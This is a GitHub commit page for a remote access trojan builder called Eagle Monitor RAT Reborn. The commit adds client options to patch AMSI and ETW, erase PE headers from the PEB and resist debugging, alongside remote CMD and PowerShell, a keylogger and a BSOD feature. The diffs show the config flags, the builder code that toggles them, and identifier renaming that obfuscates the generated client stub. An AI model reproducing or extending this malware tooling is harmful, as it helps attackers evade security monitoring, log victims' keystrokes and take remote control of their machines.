Skip to content

Commit

Permalink
3.2.3.0
Browse files Browse the repository at this point in the history 
* [New][Client] Patch AMSI
* [New][Client] Patch ETW
* [New][Client] Erase PE from PEB
* [New][Client] Anti-Debug
* [Tweaks] Added 'Optimize' attribute for csc compiler
* [New] Added Remote CMD
* [New] Added Remote Powershell
* [Fix] BSOD was not working (wrong status code)
* [Fix] Null reference with keylogger socket
  • Loading branch information
@arsium
arsium committed Nov 13, 2022
1 parent 4f1a6cf commit bdf39fa
Show file tree
Hide file tree
Showing 232 changed files with 3,157 additions and 454 deletions.
1 change: 1 addition & 0 deletions Remote Access Tool/C2/C2.csproj
View file
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,7 @@
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<None Include="App.config" />
Expand Down
5 changes: 5 additions & 0 deletions Remote Access Tool/C2/client.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -29,6 +29,10 @@ public static class Config
public static string mutex = "%MUTEX%";
public static Offline.Persistence.Method installationMethod = Offline.Persistence.Method.NONE;
public static string[] installationParam = new string[] { AppDomain.CurrentDomain.FriendlyName };
public static bool blockETW = false;
public static bool blockAMSI = false;
public static bool erasePEFromPEB = false;
public static bool antiDBG = false;
}
public class StarterClass
{
Expand Down Expand Up @@ -111,6 +115,7 @@ internal static void StartOfflineKeylogger()
[MTAThread]
public static void Main()
{
Offline.Special.Parser.Parse(Config.blockAMSI, Config.blockETW, Config.erasePEFromPEB, Config.antiDBG);
MakeInstall();
OneInstance();

Expand Down
Binary file modified Remote Access Tool/C2/obj/Release/C2.csproj.AssemblyReference.cache
View file
Binary file not shown.
2 changes: 1 addition & 1 deletion Remote Access Tool/C2/obj/Release/C2.csproj.CoreCompileInputs.cache
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
cda5eb7bc6e232f33e621e1a1a38483d03ae39f6
105dcd742de8ee0e0a6fddc63b452b7228bc3b02
Binary file modified Remote Access Tool/C2/obj/Release/C2.exe
View file
Binary file not shown.
Binary file modified Remote Access Tool/C2/obj/Release/C2.pdb
View file
Binary file not shown.
Binary file modified Remote Access Tool/C2/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
View file
Binary file not shown.
50 changes: 45 additions & 5 deletions Remote Access Tool/Eagle Monitor RAT Reborn/Builder/StubBuilder.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,8 +5,6 @@
using System.Text;
using System.Windows.Forms;
using dnlib.DotNet;
using Eagle_Monitor_RAT_Reborn.Controls;
using static Eagle_Monitor_RAT_Reborn.Network.ClientHandler;

/*
|| AUTHOR Arsium ||
Expand Down Expand Up @@ -56,18 +54,54 @@ internal static bool BuildClient()
if (Program.mainForm.offKeyloguna2CheckBox.Checked)
{
LogStep("Setting offline keylogger..." + Environment.NewLine);
stub = stub.Replace("static bool offKeylog = false;", "static bool offKeylog = true;");
stub = stub.Replace("bool offKeylog = false;", "bool offKeylog = true;");
}
else
LogStep("Skipping offline keylogger..." + Environment.NewLine);


if (Program.mainForm.patchETWGuna2CheckBox.Checked)
{
LogStep("Setting etw patch..." + Environment.NewLine);
stub = stub.Replace("bool blockETW = false;", "bool blockETW = true;");
}
else
LogStep("Skipping etw patch..." + Environment.NewLine);


if (Program.mainForm.patchAMSIGuna2CheckBox.Checked)
{
LogStep("Setting amsi patch..." + Environment.NewLine);
stub = stub.Replace("bool blockAMSI = false;", "bool blockAMSI = true;");
}
else
LogStep("Skipping amsi patch..." + Environment.NewLine);


if (Program.mainForm.erasePEHeadersGuna2CheckBox.Checked)
{
LogStep("Setting PE headers eraser..." + Environment.NewLine);
stub = stub.Replace("bool erasePEFromPEB = false;", "bool erasePEFromPEB = true;");
}
else
LogStep("Skipping PE headers eraser..." + Environment.NewLine);


if (Program.mainForm.antiDebugGuna2CheckBox.Checked)
{
LogStep("Setting anti-debug..." + Environment.NewLine);
stub = stub.Replace("bool antiDBG = false;", "bool antiDBG = true;");
}
else
LogStep("Skipping anti-debug..." + Environment.NewLine);


LogStep("Renaming code..." + Environment.NewLine);

stub = Rename(stub, "hosts");
stub = Rename(stub, "hostLists");
stub = Rename(stub, "generalKey");
stub = Rename(stub, "Config");
stub = Rename(stub, "offKeylog");
stub = Rename(stub, "installationParam");
stub = Rename(stub, "installationMethod");
stub = Rename(stub, "StarterClass");
Expand All @@ -88,7 +122,7 @@ internal static bool BuildClient()
stub = Rename(stub, "EndPacketRead");
stub = Rename(stub, "SendDataCompleted");
stub = Rename(stub, "EndConnect");

//
stub = Rename(stub, "ReadDataAsync");
stub = Rename(stub, "readDataAsync");

Expand All @@ -101,6 +135,12 @@ internal static bool BuildClient()
stub = Rename(stub, "SendDataAsync");
stub = Rename(stub, "sendDataAsync");
stub = Rename(stub, "SendData");
//
stub = Rename(stub, "offKeylog");
stub = Rename(stub, "antiDBG");
stub = Rename(stub, "erasePEFromPEB");
stub = Rename(stub, "blockAMSI");
stub = Rename(stub, "blockETW");

File.WriteAllText(Application.StartupPath + "\\Stubs\\clienttmp.cs", stub);

Expand Down
136 changes: 136 additions & 0 deletions Remote Access Tool/Eagle Monitor RAT Reborn/Controls/ClientForm.Designer.cs
View file

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

Loading

0 comments on commit bdf39fa

Please sign in to comment.